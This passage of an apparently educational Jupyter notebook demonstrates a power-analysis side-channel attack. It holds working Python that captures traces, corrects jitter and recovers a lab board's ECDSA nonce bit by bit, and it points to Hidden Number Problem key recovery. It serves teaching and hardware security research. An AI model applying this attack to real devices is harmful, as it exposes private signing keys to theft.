In [None]:
jitter_offsets = ([0,0], [0,0]) # this is something we'll need to compute and use later

def compute_sums(traces):
    global jitter_offsets
    sums = np.zeros([2,2,255])
    for kbit in range(255):
        for t in range(traces):
            for A in range(len(offsets)): # iterate 2 realignment offsets
                for M in range(len(offsets[0][0])): # iterate 2 address matches
                    for poi in pois[A][M]:
                        if A == 0:
                            start = -200
                        else:
                            start = 0
                        data = ptraces[t].wave[int(times[t][M][kbit][0]*multiplier)+offsets[A][t][M][kbit]+abs(poi)+start+jitter_offsets[A][M]]
                        if poi > 0:
                            sums[A][M][kbit] += data
                        else:
                            sums[A][M][kbit] -= data
    return sums

def calc_sumdata(poi00=1, poi01=1, poi10=1, poi11=1, traces=len(ptraces)):
    pois = [[poi00, poi01], [poi10, poi11]]
    sumdata = np.zeros(255)
    sums = compute_sums(traces)
    for i in range(2):
        for j in range(2):
            if pois[i][j]:
                sumdata += sums[i][j]
    return sumdata

def update_sumplot(poi00=1, poi01=1, poi10=1, poi11=1, traces=len(ptraces)):
    sumdata = calc_sumdata(poi00, poi01, poi10, poi11, traces)
    sumline.data_source.data['y'] = sumdata
    push_notebook()
    

In [None]:
xrange = range(255)

sumplot = figure(plot_width=1800)
sumplot.add_tools(tools.HoverTool())
sumdata = calc_sumdata(1,1,1,1,len(ptraces))
sumline=sumplot.line(xrange, sumdata, line_color="purple")

In [None]:
show(sumplot, notebook_handle=True)

In [None]:
interact(update_sumplot, poi00=(0,1), poi01=(0,1), poi10=(0,1), poi11=(0,1), traces=(0,len(ptraces)))

The $k_r$ that we are hoping to retrieve was chosen so that it would be easy to see if we're on the right track or not:

In [None]:
hex(kr)

As you play with the knobs, you should see that the poi00 set is problematic in three ways:
1. It does not appear to catch the lone 0 bit (4th bit from MSB);
2. The curve falls from high to low at index 128, whereas $k_r$'s block of zeros starts at index 124;
3. The curves jumps around a fair bit during the long strings of ones and zeros, even when all the traces are used.

The poi00 set contains points of interest that were captured starting at 200 cycles before the first function call in the main loop; this may actually be catching instructions that were running in the *previous* iteration of the loop.

In constrast, the poi01 set seems to work extremely well: it has none of the above issues, and it appears to accurately identify all the bits even with a single trace. The poi10 and poi11 sets also work well, but it's hard to determine whether or not they help, or whether it's better to use just poi01.

Before we move onto the full attack, let's try a less regular $k_r$, with a pattern which also allows us to distinguish the first and last bits. This time we'll capture just 20 traces, just to save time.

In [None]:
kr = 0xf0ccccccccccccccccccccccccccccccaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0f
k = input_k(kr)

In [None]:
# This is the same code we used earlier to capture the traces and realign the trace segments.
# Let's make it into a function so we can use this in the final attack without copy/pasting it again:

from tqdm.notebook import tnrange
import numpy as np
def get_traces(traces=20):
    ptraces = []
    raws = []
    
    # acquire power and debug traces:
    for t in tnrange(traces, desc='Capturing traces'):
        Px, Py = new_point()
        trace.arm_trace()
        ptrace = capture_ecc_trace(k, Px, Py)
        ptraces.append(ptrace)
        while trace.fifo_empty(): pass
        raws.append(trace.read_capture_data())

    # convert debug traces into timestamps:
    times = []
    for i in range(len(raws)):
        times_both_markers = trace.get_rule_match_times(raws[i], rawtimes=False, verbose=False)
        assert len(times_both_markers) == 510, 'Got %d markers, expected 510' % len(times_both_markers)
        times_p1 = times_both_markers[::2]
        times_p2 = times_both_markers[1::2]
        times.append([times_p1, times_p2])

    # compute offsets:
    basesegment = 0
    offsets = np.zeros([2,len(ptraces),2,255], np.int32)
    for A in range(2): # early/late realignment offset
        if A == 0:
            start = -200
            complength = 230
        else:
            start = 0
            complength = 300
        for M in range(2): # address match index
            reftrace = np.asarray(ptraces[0].wave[int(times[0][M][basesegment][0]*multiplier) + start : int(times[0][M][basesegment][0]*multiplier) + complength + start])
            for T in tnrange(len(ptraces), desc='Realigning for A=%d, M=%d' % (A,M)):
                for kbit in range(255):
                    if kbit == basesegment:
                        pass
                    else:
                        diffs = []
                        for offset in range(-100,100):
                            comptrace = np.asarray(ptraces[T].wave[int(times[T][M][kbit][0]*multiplier) + offset + start : int(times[T][M][kbit][0]*multiplier) + complength + offset + start])
                            diffs.append(np.sum(abs(reftrace-comptrace)))
                        if min(diffs) < np.average(np.asarray(diffs))*.7:
                            offsets[A][T][M][kbit] = diffs.index(min(diffs)) - 100
                        else:
                            print('Failure for t=%d, i=%d (min=%f, avg=%f)' % (t, i, min(diffs), np.average(np.asarray(diffs))))

    return ptraces, times, offsets

In [None]:
ptraces, times, offsets = get_traces(20)

We don't need to recalculate the points of interest - they should be the same regardless of $k_r$ (if they aren't, then we need a different attack strategy).

If you now go back up and re-run the cells which generate `sumplot`, you might be lucky and see expected results for our new $k_r$, or you might see something that looks like garbage.

## Return of the Jitter
Here's our problem: the points of interest were established for a particular trace realignment. Recall that trace realignment was necessary due to the +/- 71 clock cycle jitter in the debug trace events. Remember when I warned that we'd have to deal with jitter again... Since we are attempting to distinguish the bits of $k_r$ by looking at power samples on specific clock cycles, we *must* have perfect trace alignment for each trace capture.

If the reference trace segment used in our first trace acquisition run was at +71 cycles and the reference trace segment used in this second run is not (or vice-versa), then the points of interest will all be off by +/- 71 clock cycles. This is annoying, but it's easy to correct for (if you know what to look for). We'll go about this with a simple heuristic: try different offsets and pick the one which results in `sumplot` looking like a string of well-defined zeros and ones.

This is how we do it:
- modify `compute_sums()` to use a series of different offsets (e.g. +71, 0, -71), and save the sum results for each offset
- normalize each of the sum results to an average of zero and a range of +/-1:
    - apply a vertical shift such that the average of each sum array is 0
    - multiply by a constant so that the maximum and minimum value of each sum array is +1 and -1
- if we have the right offset, the right points of interest, and sufficient traces (and assuming that our attack works! (spoiler: it does)), then the absolute value of the resulting sum array would be a constant +1
- it follows that the sum array with the smallest variance is the best choice

What's nice about this method is that it can be run in a completely automated fashion.

Because debug trace data is sampled asynchronously to the target clock, we'll add a few more candidate offsets to our list of possible offsets.

Here's a function to automatically find the best jitter offset. It does this for each of the four sets of points of interest.

In [None]:
def find_jitter_offsets(verbose=False):
    jitter_offsets = np.zeros([2,2], np.int32)
    candidates = [-2, -1, 0, 1, 2, 69, 70, 71, 72, 73, -69, -70, -71, -72, -73]
    for A in range(2):
        for M in range(2):
            # 1. calculate sums:
            allsums = []
            if A == 0:
                start = -200
            else:
                start = 0
            for i,jitterstart in enumerate(candidates):
                sums = []
                for kbit in range(len(times[0][0])):
                    sum = 0
                    for t in range(len(ptraces)):
                        for poi in pois[1][1]:
                            data = ptraces[t].wave[int(times[t][M][kbit][0]*multiplier)+offsets[A][t][M][kbit]+abs(poi)+start+jitterstart]
                            if poi > 0:
                                sum += data
                            else:
                                sum -= data
                    sums.append(sum)
                allsums.append(sums)

            # 2. shift and scale:
            fixedsums = []
            for i in range(len(allsums)):
                wave = np.asarray(allsums[i][1:])
                avg = np.average(wave)
                # OG: waverange = abs(max(wave) - min(wave))
                waverange = np.average(abs(wave-avg))
                fixedsums.append((wave-avg)/waverange)

            # 3.  pick best candidate:
            scores = []
            for i in range(len(fixedsums)):
                cand = np.asarray(fixedsums[i])
                avg = np.average(cand)
                cand = np.abs(cand - avg)
                metric = np.var(cand)
                if verbose: print('%d %6f' % (i, metric))
                scores.append(metric)
            chosen = np.argmin(scores)
            print("Choosing index %d: offset=%d for A=%d, M=%d" % (chosen, candidates[chosen], A, M))
            jitter_offsets[A][M] = candidates[chosen]
    return jitter_offsets


In [None]:
jitter_offsets = find_jitter_offsets()

If you now go back and re-run the cell for the interactive `sumplot` display (which automatically uses this computed jitter offset), you should see nice results again.

You should see something like this when poi01 is selected:

![poi11](img/bit_train.png)

If you don't see this, you can either:
- try again with a fresh set of traces;
- try the suggested `poi` values;
- try other `jitter_offsets` values.

If you don't resolve this and simply continue the notebook, the attack will likely not work for you.

Assuming you do have a nice train of ones and zeros, here are some observations that you should be able to make:

- the poi01 results, which previously looked so good with long strings of constant 1's and 0's, don't look as good anymore;
- poi11 gives the best result; (although on Husky, poi01 can work better)
- the repeated 0xc's and 0xa's are clear;
- we have no useful information for the first (most significant) bit, because it gives a very different score;
- there is no information at all for the last (least significant) bit.

It's easy to understand why the last bit is missing: we collected 255 timestamps for each function call, not 256, because the last bit is processed outside of the main loop.

But it doesn't matter: we now have a mechanism to retrieve 254 bits, and we only need to guess 2 bits. We can brute-force that very easily.  **We have a viable attack!**

# The Attack
This time let's play for real: we'll generate a random $k$ and see whether our attack can retrieve it.

If you have a CW-lite, you may choose to skip executing all of the preceding profiling steps and jump right to here, by using the example `pois` array that is defined earlier.

In [None]:
import numpy as np

In [None]:
k = random_k()
kr = regularized_k(k)
hex(k), hex(kr)

In [None]:
traces = 20
ptraces, times, offsets = get_traces(traces)
jitter_offsets = find_jitter_offsets()

Each time we acquire a set of traces, we must guess at the correct jitter offset.

(If you run trace collection a bunch of times, you may observe that the jitter offset appears to always be the same, but trust me, *it does sometimes change!*)

Let's visualize the attack results (you can also go back to the `sumplot` cells if you want, this is for convenience).

You may want to adjust the arguments to `calc_sumdata()` if your earlier results suggested that a different POI works better than poi11.

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span, tools

output_notebook(INLINE)

xrange = range(254)

attackplot = figure(plot_width=1800)
attackplot.add_tools(tools.HoverTool())
attackplot.line(xrange, calc_sumdata(0,0,0,1,len(ptraces))[1:], line_color="purple")


In [None]:
show(attackplot)

Based on previous results, we chose to use only the poi11 (A=1, M=1) results. You can experiment with the other components by changing the arguments to the `calc_sumdata()` call.

The plot above should look like a series of nicely distinguished 1's and 0's, like this (since `k` is random, the odds of your plot looking exactly like this are nil! a clear distinction between ones and zeros is what you should find):

![poi11](img/attack_plot.png)

If your plot looks good, proceed to guessing all the bits.

Otherwise, you can try a different POI set, different values for `jitter_offsets`, or simply try a fresh trace acquisition.

In [None]:
sumdata = calc_sumdata(0,0,0,1,traces)[1:]
sumdata -= np.average(sumdata)

In [None]:
# guess all bits from waveform:
guess = ''
for i in range(254):
    if sumdata[i] > 0:
        guess += '1'
    else:
        guess += '0'

In [None]:
# first and last bit are unknown, so enumerate the possibilities:
guesses = []
for first in (['0', '1']):
    for last in (['0', '1']):
        guesses.append(int(first + guess + last, 2))

In [None]:
kr = regularized_k(k)
if kr in guesses:
    print('Guessed right!')
else:
    print('Attack failed.')
    print('Guesses: %s' % hex(guesses[0]))
    print('         %s' % hex(guesses[1]))
    print('         %s' % hex(guesses[2]))
    print('         %s' % hex(guesses[3]))
    print('Correct: %s' % hex(kr))
    wrong_bits = []
    for kbit in range(1,254):
        if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
            wrong_bits.append(255-kbit)
    print('%d wrong bits: %s' % (len(wrong_bits), wrong_bits))

The attack should have succeeded. The attack does occasionally fail, usually because incorrect offset guesses are made (in which case the results look really bad - about half the bits are guessed wrong, so no better than random guessing), but with 20 traces it should succeed most of the time.

The last step is to see how well the attack works as we reduce the number of traces used.

Note that we're cheating a *little bit* here because the attacks with fewer traces are still using the offsets that were computed from **all** of the captured traces. But the leakage is still there and could still be found if fewer traces had been captured; we would just have had to work harder at finding it (i.e. use a better offset guessing algorithm).

In [None]:
for attack_traces in range(traces,0,-1):   
    print('Attacking with %d traces... ' % attack_traces,  end='')
    
    sumdata = calc_sumdata(0,0,0,1,attack_traces)[1:]
    sumdata -= np.average(sumdata)

    # guess all bits from waveform:
    guess = ''
    for i in range(254):
        if sumdata[i] > 0:
            guess += '1'
        else:
            guess += '0'

    # first and last bit are unknown, so enumerate the possibilities:
    guesses = []
    for first in (['0', '1']):
        for last in (['0', '1']):
            guesses.append(int(first + guess + last, 2))

    kr = regularized_k(k)
    if kr in guesses:
        print('Success!')
    else:
        wrong_bits = []
        for kbit in range(1,254):
            if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
                wrong_bits.append(255-kbit)
        print('FAILED. %d bits are wrong: %s' % (len(wrong_bits), wrong_bits))

# Next steps

If you iterate the above with different random $k$, you should find the attack usually succeeds with as few as 6 to 8 traces.

If you try a few times and repeatedly have results worse than described here, it's possible you were unlucky in choosing the points of interest; see what happens if you repeat the attack with these:

In [None]:
pois = [[[-6, -108, -109, -110, -111, -128], [14, 15, -1, -28, -29, -38, -39, -48, -49, -59, -69, -79, -89]], [[77, 78, 257, -80, -103, -206, -215, -259], [-71, -72, -73, -74, -251, -252, -253]]]

With CW-Husky, best results were obtained with these values for poi01:

`[33, 34, 35, -38, -47, -48, -58, -67, -68, -77, -78, -87, -88, -98, -107, -108]`

It may also possible to refine the attack (e.g. finding the very best POI). This attack uses an ad-hoc approach which is able to find fairly good POI (at least most of the time), but these are by no means garanteed to be optimal. Sometimes you may get lucky: the best result seen from running this notebook is a successfui 2-trace attack. This is tantalizingly close to a single-trace attack!

With this attack, success with a single trace is a big deal. This is because this attack requires that all traces use the same $k$. But in ECDSA, $k$ is a nonce -- it's not supposed to be used more than once. So this attack is not entirely realistic if it requires multiple traces. But it does show how much margin there is for a single-trace attack to work. And that's not all: notice that the single trace results tend to have as few as 40 wrong bit guesses. This suggests that many of the bits could be reliably guessed. If we can determine with high probability which bits can be guessed correctly, the **Hidden Number Problem** (HNP) can be applied.

With HNP, multiple ECDSA signatures with different $k$ are observed. If we have partial knowledge of the $k$ used for each signature, and if we observe enough signatures, the full $k$ can be retrieved. This is left as an exercise to the reader. Recent ECC attack papers using HNP include:
- [Minerva: The curse of ECDSA nonces](https://tches.iacr.org/index.php/TCHES/article/view/8684)
- [A Side Journey to Titan: Side-Channel Attack on the Google Titan Security Key](https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf)

Another idea to try, which may (or not) be more realistic/useful in noisy environments, is to apply a horizontal correlation attack. See this paper for an example of a horizontal correlation attack: [Horizontal collision correlation attack on elliptic curves](https://link.springer.com/article/10.1007/s12095-014-0111-8), as well as our own [hardware ECC attack tutorial](https://github.com/newaetech/chipwhisperer-jupyter/blob/master/demos/CW305_ECC.ipynb) (requires CW305 FPGA target board).

Finally, as it's been noted throughout this notebook, none of the chosen attack parameters have been proven to be optimal; see if you can do better, and if so send a pull request!